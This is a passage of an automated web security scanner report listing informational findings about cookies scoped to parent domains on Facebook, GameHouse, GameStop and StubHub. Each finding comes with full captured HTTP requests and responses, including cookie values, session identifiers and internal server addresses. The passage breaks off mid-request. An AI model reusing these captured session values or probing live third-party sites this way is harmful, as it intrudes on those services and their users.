Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; wd=1065x723

Response

13.131. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

13.132. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...

13.133. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.40
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:25 GMT
Content-Length: 0

13.134. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

13.135. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...

13.136. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...

13.137. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...

13.138. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...

13.139. http://www.gamehouse.com/images/subsidiary.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamehouse.com
Path:	/images/subsidiary.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Wed, 20-Jul-2011 20:24:53 GMT;path=/;domain=gamehouse.com;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/subsidiary.png HTTP/1.1
Host: www.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Set-Cookie: referrer=aHR0cDovL3N1cHBvcnQuZ2FtZWhvdXNlLmNvbS8=
Set-Cookie: JSESSIONID=A68BAE3959CA123F9A7FB421FB8A1170.gh-storefront-app03; Path=/
ETag: W/"2557-1310759798000"
Last-Modified: Fri, 15 Jul 2011 19:56:38 GMT
Content-Type: image/png;charset=UTF-8
Content-Length: 2557
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Wed, 20-Jul-2011 20:24:53 GMT;path=/;domain=gamehouse.com;httponly

.PNG
.
...IHDR...\...".......N.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......=R............LLL.i.... jjj.......]..t.eee...QQQ+Sk+7?")-.8H.V|@T_.a.rrrJJJ...*ET...vvv....|.+Nc^^^
g.lll....a.~~
...[SNIP]...

13.140. http://www.gamestop.com/Recommendations.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/Recommendations.axd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RES_TRACKINGID=783322707284241; domain=gamestop.com; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Recommendations.axd HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
Content-Length: 122
Origin: http://www.gamestop.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

{"l":"peYfab2EsTTWwlqkVMgA4Q==","r":"rcxKUs77Dw02ESv5cb+e+w==","rr":"IF8Yy95dSt9Ecb50XY6Mog==","c":"Locale=en-US","su":""}

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/json; charset=utf-8
Content-Length: 10
Date: Tue, 19 Jul 2011 16:04:47 GMT
Connection: close
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/
Set-Cookie: CactusState=V=1&31=False; path=/
Set-Cookie: RES_TRACKINGID=783322707284241; domain=gamestop.com; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/

{"d":null}

13.141. http://www.stubhub.com/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=379551A8B23610B2DCD699373A2BF429; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /TeaLeafTarget.html HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 973
Origin: http://www.stubhub.com
X-TeaLeaf-Page-Img-Fail: 2
X-TeaLeaf-Page-Render: 6032
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.03.15.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 2
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; 